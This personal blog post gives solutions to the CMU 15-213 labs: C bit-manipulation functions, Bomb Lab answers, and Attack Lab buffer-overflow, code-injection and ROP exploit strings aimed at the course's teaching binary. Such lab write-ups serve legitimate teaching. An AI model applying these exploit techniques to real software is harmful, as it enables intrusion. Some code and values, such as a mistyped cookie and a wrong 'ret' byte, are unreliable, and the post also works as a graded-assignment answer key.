Solutions to CMU 15213 Labs

This post is an archive for my personal solutions to the ten labs for the CMU 15213 course. You can access the self-study labs at the CSAPP official website.

Lab 1: Data Lab

This lab instructs you to write functions using bit-wise operations.

bixXor

Implements xor using only ~ and &. The key is to notice that x | y == ~(~x & ~y).

1
2
3
int bitXor(int x, int y) {
return ~(~(~x & y) & ~(x & ~y));
}

tmin

Returns the minimum two's complement integer.

1
2
3
int tmin(void) {
return 1 << 31;
}

isTmax

Checks if the input is the maximum two's complement integer. Notice that the maximum integer has a leading 0 and all remaining bits are 1.

1
2
3
int isTmax(int x) {
return !((x + 1) ^ ~x) & !!(x ^ ~0);
}

Another way to think the maximum integer is, it's the only number that equals to 0 when adding (1 << 31) + 1. So we can also use the following simpler code:

1
2
3
int isTmax(int x) {
return !(x + (1 << 31) + 1);
}

allOddBits

Checks if all odd index bits are set to 1. You can create a mask to detect the pattern.

1
2
3
4
5
int allOddBits(int x) {
int m = (0xAA << 8) + 0xAA;
m = (m << 16) + m;
return !(m ^ (m & x));
}

negate

Negates the input.

1
2
3
int negate(int x) {
return ~x + 1;
}

isAsciiDigit

Checks if the input is an ASCII digit, e.g., hex representation between 0x30 and 0x39. We can divide the pattern into the parts. The first part is 0x30, and the second is 0x0? where ? can be 0 to 9. When examining the second part, the least significant byte either does not exceed 1000 (0x8), or is exactly 0x8 or 0x9.

1
2
3
4
int isAsciiDigit(int x) {
int y = 0xF & x;
return !((0x30 ^ x) >> 4) & (!(0x8 & y) | !(0x8 ^ y) | !(0x9 ^ y));
}

conditional

Implements the conditional operator x ? x : y. Just use mask to achieve it.

1
2
3
4
int conditional(int x, int y, int z) {
int m = ~(!x) + 1;
return (~m & y) | (m & z);
}

isLessOrEqual

Checks if the first argument is less or equal than the second argument. You can use -x == ~x + 1 and examine the sign bit.

1
2
3
int isLessOrEqual(int x, int y) {
return !(((~x + 1) + y) >> 31);
}

logicalNeg

Implements the ! operator. That's, for any non-zero number, it returns 0 and for zero it returns 1. If the input is negative (the sign bit is 1), or the input added with -1 overflows then the input is non-zero.

1
2
3
int logicalNeg(int x) {
return (((x >> 31) ^ 0x1) & 0x1) & ((((x + (~1 + 1)) >> 31) ^ 0x0) & 0x1);
}

howManyBits

Returns the minimum number of bits required to represent the input integer. Note that a positive integer implies a leading 0 and a negative integer implies a leading 1. Therefore in either case, we must at least have a sign bit. We can safely invert all bits of a negative integer and from the most significant bit to the least significant bit find the index at which the bit is 1.

The trick here is to binary-search such index. To do this, we must create several masks, shown as in the following code. For example, Mask_16 = 0xFFFF0000 detects whether any of the most significant 16 bits is 1. If so, it means the result is at least 16. Then we can right shift the number 16 bits to recursively examine the most significant 16 bits by applying Mask_8 = 0xFF00.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
int howManyBits(int x) {
int ToPositive = x ^ (x >> 31);
int Mask_0 = 0x1;
int Mask_1 = 0x2;
int Mask_2 = 0xC;
int Mask_4 = 0xF0;
int Mask_8 = 0xFF << 8;
int Mask_16 = (Mask_8 | 0xFF) << 16;

int Count, Result = 1;
Count = !!(ToPositive & Mask_16) << 4;
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_8) << 3;
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_4) << 2;
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_2) << 1;
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_1);
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_0);
Result += Count;

return Result;
}

floatScale2

Returns 2*f where the input is interpreted as a floating-point number. You should be careful about the border cases. If the input number is NaN or infinity (i.e. the exponent is all ones), the function returns the input as required. If the input is denormalized (i.e. the exponent is all zeros), the input will be shifted left 1 bit. If it's normalized (i.e. the exponent is neither all zeros nor all zeros), we just add one to the exponent.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
unsigned floatScale2(unsigned uf) {
int MantissaMask = 0x7FFFFF, Mantissa = MantissaMask & uf;
int ExponentMask = 0xFF << 23, Exponent = ExponentMask & uf;
int Sign = (0x1 << 31) & uf;

int IsNaNOrInfinity = !(ExponentMask ^ Exponent);
int IsDenormalized = !(ExponentMask & Exponent);
if (IsNaNOrInfinity)
{
return uf;
}
else if (IsDenormalized)
{
int ExceptSign = uf << 1;
return Sign | ExceptSign;
}
else
{
int NewExponent = ExponentMask & (Exponent + (1 << 23));
return Sign | NewExponent | Mantissa;
}
}

floatFloat2Int

Returns bit-level equivalent of (int) x where x is interpreted as a floating number. Be aware of the border cases: (1) if the input is zero, the function also returns zero; (2) if the input is NaN or infinity, it returns 0x80000000u as required; (3) if the input is denormalized, it returns zero; (4) if the input is normalized, determine the result by checking the exponent.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
int floatFloat2Int(unsigned uf) {
int MantissaMask = 0x007FFFFF, Mantissa = MantissaMask & uf;
int ExponentMask = 0x7F800000, Exponent = ExponentMask & uf;
int SignMask = 0x80000000, Sign = SignMask & uf;

int Exp = (Exponent >> 23) - 127, Result, i, BitMask;

int IsNaNOrInfinity = !(ExponentMask ^ Exponent);
int IsDenormalized = !(ExponentMask & Exponent);
int IsNegative = !(SignMask ^ Sign);

// Is +0 or -0
if (!(uf << 1))
{
return 0;
}

// Is NaN or infinity.
if (IsNaNOrInfinity)
{
return 0x80000000u;
}

// Is denormalized
if (IsDenormalized)
{
return 0;
}

// Is normalized
if (Exp < 0)
{
return 0;
}
if (Exp >= 31)
{
return 0x80000000u;
}

Result = 1 << Exp;
Exp -= 1;
for (i = 22; i >= 0 && Exp >= 0; --i, --Exp)
{
BitMask = !!(Mantissa & (1 << i));
Result += BitMask * (1 << Exp);
}

if (IsNegative)
{
Result = -Result;
}

return Result;
}

floatPower2

Returns 2.0^x for any given integer x. The smallest non-zero floating (denormalized) number is 2^(-126+23)=2^(-149). So if the input is smaller than -149, the functions should return 0. The largest denormalized floating number in the form of 2.0^x is x^(-127). In the range of -149 and -127, we just left shift one by x+149. The smallest normalized number (also, in the form of 2.0^x) is 2^(-126) and the largest is 2^(254-127)=2^(127). In this case, we left shift x+127 by 23 to occupy the exponent part. If x exceeds 127, the function returns +INF.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
unsigned floatPower2(int x) {
if (x < -149)
{
return 0;
}
else if (x <= -127)
{
return 1 << (x + 149);
}
else if (x <= 127)
{
return (x + 127) << 23;
}
else // x > 127
{
return 0x7F800000;
}
}

Lab 2: Bomb Lab

The answers to the six phases are respectively:

1
2
3
4
5
6
Border relations with Canada have never been better.
1 2 4 8 16 32
0 207
7 0
iOnUvW
4 3 2 1 6 5

If we deciphered the secret phase, the answers will be (adding string DrEvil after the third line):

1
2
3
4
5
6
Border relations with Canada have never been better.
1 2 4 8 16 32
0 207
7 0 DrEvil
iOnUvW
4 3 2 1 6 5

Note that some of the answers are not unique. Let's quickly go through these phases.

Phase 1

Find the string at address 0x402400. You can use x/s 402400 to extract it!

Phase 2

The key to solve this phase is know the functionality of each register:

  • %rdi: the first argument.
  • %rsi: the second argument.
  • %rdx: the third argument.
  • %rcx: the forth argument.
  • %r8: the fifth argument.
  • %r9: the sixth argument.

More arguments are stored in stack. Know at which positions these arguments are stored in stack and you'll get the answer!

Phase 3

This function reads two integers and switches to the address accroding to the first integer. If the destination address has a value same as the second integer, the phase passes.

This phase has multiple answers. You can choose one of the followings:

  • 0 207
  • 1 311
  • 2 707
  • 3 256
  • 4 389
  • 5 206
  • 6 682
  • 7 327

Phase 4

The key is to decode func4(x, s, e) and understand it returns some numbers of steps to find x between [s, e] using binary search. s=0 and e=14. The function returns 0 if it finds x in the very first step. So x=7.

Phase 5

This phase executes the following steps:

  • The answer string length is 6.
  • Reads a string from 0x4024b0 and compares it to the string at 0x40245e, which is flyers.
  • The string at 0x4024b0 is maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?.
  • The indices respectively for f, l, y, e, r, s at 0x4024b0 is 9, 15, 14, 5, 6, 7. The hex representations are 9, f, e, 5, 6, 7.
  • Find in the ASCII table those characters whose low hex representation is 9, f, e, 5, 6 and 7. So there are multiple possible answers.

Phase 6

This is the most difficult phase (including the secret one), in terms of it's length of assembly... Be patient and take a careful look at the assembly. You'll find this phase does the following things:

  • It reads six integers and stores them in stack from the bottom up.
  • Each integer is different and all are smaller or equal than 6.
  • Subtracts each integer from 7. For example, 6 turns into 1.
  • According to the result integer, this function jumps to the target address from 0x6032d0 and reads the value. This value is also an address. The results are stored from %rsp+32 to %rsp+72, amounting to totally eight addresses.
  • Sets *(*(%rsp+t)+8)=*(%rsp+t+8), where t=32, 3a, 42, ..., 6a. For t=72, the target value is zero.
  • It actually implements a linked list, likely implemented as follows:
    1
    2
    3
    4
    struct node {
    int value;
    node* next;
    };
  • This linked list has a list of non-ascending values.
  • Find the indices in a non-ascending order and restore the input indices.

Secret Phase

Disassembling the phase_defused function and you will find a secret secret_phase function. This is the hidden phase of this lab. The secret_phase function does:

  • Receives an integer less or equal than 1001.
  • Calls function fun7(int* s, int x) and returns 2.
  • The fun7(int* s, int x) function receives a pointer s to a binary search tree node and finds value x in the tree.
  • Your goal is to find in this tree a value that returns 2, according to the calculation rules.

This binary search tree node looks like this:

1
2
3
4
5
6
7
8
9
         36
/ \
/ \
/ \
8 50
/ \ / \
6 22 45 100
/ \ / \ / \ / \
1 7 20 35 40 47 99 1001

Lab 3: Attack Lab

This lab asks you to construct exploits to have the function output specific strings. Before start, make sure to take a glance at the handout, which has detailed instructions for this lab. Remember to use -Og to compile the .s file and use objdump -d to generate byte codes.

Phase 1

In the getbuf() function, %rsp has an address of 0x5561dc78 and the return address is located at %rsp+0x28, which is 0x5561dca0. To call the touch1() function, you should set the return address as the address of touch1(), that is, 0x4017c0.

The input to ctarget is thus:

1
2
3
4
5
6
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
c0 17 40 00 00 00 00 00

The first 40 bytes are arbitrary except \n.

Phase 2

In this phase, you should put 0x591997fa into %rdi and jump to 0x4017ec to execute function touch2().

The first step is to write a .s file:

1
2
3
movq $0x59b997fa, %rdi
pushq $0x4017ec
ret

Then generate its byte codes:

1
2
3
48 c7 c7 fa 97 b9 59 // movq $0x59b997fa, %rdi
68 ec 17 40 00 // pushq $0x4017ec
c0 // ret

Write the input exploit file:

1
2
3
4
5
6
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
48 c7 c7 fa 97 b9 59 68 // Address 0x5561dc90, return here to execute instructions
ec 17 40 00 c3 00 00 00
90 dc 61 55 00 00 00 00 // Destination address

Phase 3

Note that in this phase, the content in the stack may be overwritten by function hexmatch(). So you must write the content in some high location of the stack.

The assembly code is:

1
2
3
movq $0x5561dca8, %rdi
pushq $0x4018fa
ret

The generated byte codes are:

1
2
3
48 c7 c7 a8 dc 61 55  // movq $0x5561dca8, %rdi
68 fa 18 40 00 // pushq $0x4018fa
c3 // ret

The input exploit is:

1
2
3
4
5
6
7
48 c7 c7 a8 dc 61 55 68 // Address 0x5561dc78
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 // Destination address
35 39 62 39 39 37 66 61 // Address 0x5561dca8, string "59b997fa"

Phase 4

In this phase, you should construct two gadgets, one for moving data 0x59b997fa into some register like %rax, and the other one for moving %rax to %rdi as the argument into the function. Last, you should return to function touch2().

You can find a function which contains the desired byte codes and returns to that location. The first gadget uses the function addval_219 and the second function is setval_426. You can choose other functions if applicable.

1
2
3
4
5
6
7
8
9
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00 // Jump to middle of function addval_219 and perform pop
fa 97 b9 59 00 00 00 00 // cookie value 0x59b997fa, popped to %rax
c5 19 40 00 00 00 00 00 // Jump to middle of function setval_426 and perform mov %rax, %rdi
ec 17 40 00 00 00 00 00 // Return to touch2()

Here is a full list of decoded byte codes for all functions in farm.c. Use Ctrl+F to search the byte patterns you want.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
// 0x40199a: b8 fb 78 90 90 c3
unsigned getval_142()

// 0x4019a0: 8d 87 48 89 c7 c3 c3
unsigned addval_273(unsigned x)

// 0x4019a7: 8d 87 51 73 58 90 c3
unsigned addval_219(unsigned x)

// 0x4019ae: c7 07 48 89 c7 c7 c3
void setval_237(unsigned *p)

// 0x4019b5: c7 07 54 c2 58 92 c3
void setval_424(unsigned *p)

// 0x4019bc: c7 07 63 48 8d c7 c3
void setval_470(unsigned *p)

// 0x4019c3: c7 07 48 89 c7 90 c3
void setval_426(unsigned *p)

// 0x4019ca: b8 29 58 90 c3 c3
unsigned getval_280()

// 0x4019d6: 48 8d 04 37 c3
long add_xy(long x, long y)

// 0x4019db: b8 5c 89 c2 90 c3
unsigned getval_481()

// 0x4019e1: c7 07 99 d1 90 90 c3
void setval_296(unsigned *p)

// 0x4019e8: 8d 87 89 ce 78 c9 c3
unsigned addval_113(unsigned x)

// 0x4019ef: 8d 87 8d d1 20 db c3
unsigned addval_490(unsigned x)

// 0x4019f6: b8 89 d1 48 c0 c3
unsigned getval_226()

// 0x4019fc: c7 07 81 d1 84 c0 c3
void setval_384(unsigned *p)

// 0x401a03: 8d 87 41 48 89 e0 c3
unsigned addval_190(unsigned x)

// 0x401a0a: c7 07 88 c2 08 c9 c3
void setval_276(unsigned *p)

// 0x401a11: 8d 87 89 ce 90 90 c3
unsigned addval_436(unsigned x)

// 0x401a18: b8 48 89 e0 c1 c3
unsigned getval_345()

// 0x401a1e: 8d 87 89 c2 00 c9 c3
unsigned addval_479(unsigned x)

// 0x401a25: 8d 87 89 ce 38 c0 c3
unsigned addval_187(unsigned x)

// 0x401a2c: c7 07 81 ce 08 db c3
void setval_248(unsigned *p)

// 0x401a33: b8 89 d1 38 c9 c3
unsigned getval_159()

// 0x401a39: 8d 87 c8 89 e0 c3 c3
unsigned addval_110(unsigned x)

// 0x401a40: 8d 87 89 c2 84 c0 c3
unsigned addval_487(unsigned x)

// 0x401a47: 8d 87 48 89 e0 c7 c3
unsigned addval_201(unsigned x)

// 0x401a4e: b8 99 d1 08 d2 c3
unsigned getval_272()

// 0x401a54: b8 89 c2 c4 c9 c3
unsigned getval_155()

// 0x401a5a: c7 07 48 89 e0 91 c3
void setval_299(unsigned *p)

// 0x401a61: 8d 87 89 ce 92 c3 c3
unsigned addval_404(unsigned x)

// 0x401a68: b8 89 d1 08 db c3
unsigned getval_311()

// 0x401a6e: c7 07 89 d1 91 c3 c3
void setval_167(unsigned *p)

// 0x401a75: c7 07 81 c2 38 d2 c3
void setval_328(unsigned *p)

// 0x401a7c: c7 07 09 ce 08 c9 c3
void setval_450(unsigned *p)

// 0x401a83: 8d 87 08 89 e0 90 c3
unsigned addval_358(unsigned x)

// 0x401a8a: 8d 87 89 c2 c7 3c c3
unsigned addval_124(unsigned x)

// 0x401a91: b8 88 ce 20 c0 c3
unsigned getval_169()

// 0x401a97: c7 07 48 89 e0 c2 c3
void setval_181(unsigned *p)

// 0x401a9e: 8d 87 89 c2 60 d2 c3
unsigned addval_184(unsigned x)

// 0x401aa5: b8 8d ce 20 d2 c3
unsigned getval_472()

// 0x401aab: c7 07 48 89 e0 90 c3
void setval_350(unsigned *p)

Phase 5

Here is how you should think to solve this phase:

  • Function touch3(const char*) receives an address as the argument. So you should prepare an address value in %rdi.
  • This address value should come from %rsp. An intuitive way is use mov %rsp, %rax.
  • However, the cached %rsp value is not allowed to store the string value because it will be immediately transmitted to PC as the address of the next instruction. It must be a valid address.
  • farm.c provides a function add_xy(long, long). It can be leveraged to offset the value of %rsp.
  • The returned value of add_xy(long, long) is the address where the string is actually stored. It lies at the highest position of our input.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 // mov %rsp, %rax
c5 19 40 00 00 00 00 00 // mov %rax, %rdi
ab 19 40 00 00 00 00 00 // pop %rax (0x48 is the offset)
48 00 00 00 00 00 00 00 // (popped offset)
42 1a 40 00 00 00 00 00 // movl %eax, %edx
69 1a 40 00 00 00 00 00 // movl %edx, %ecx
27 1a 40 00 00 00 00 00 // movl %ecx, %esi
d6 19 40 00 00 00 00 00 // call add_xy
c5 19 40 00 00 00 00 00 // mov %rax, %rdi
fa 18 40 00 00 00 00 00 // call touch3
35 39 62 39 39 37 66 61 // string "59b997fa"

Lab 4: Buffer Lab

Lab 5: Architecture Lab

Lab 6: Cache Lab

Lab 7: Performance Lab

Lab 8: Shell Lab

Lab 9: Malloc Lab

Lab 10: Proxy Lab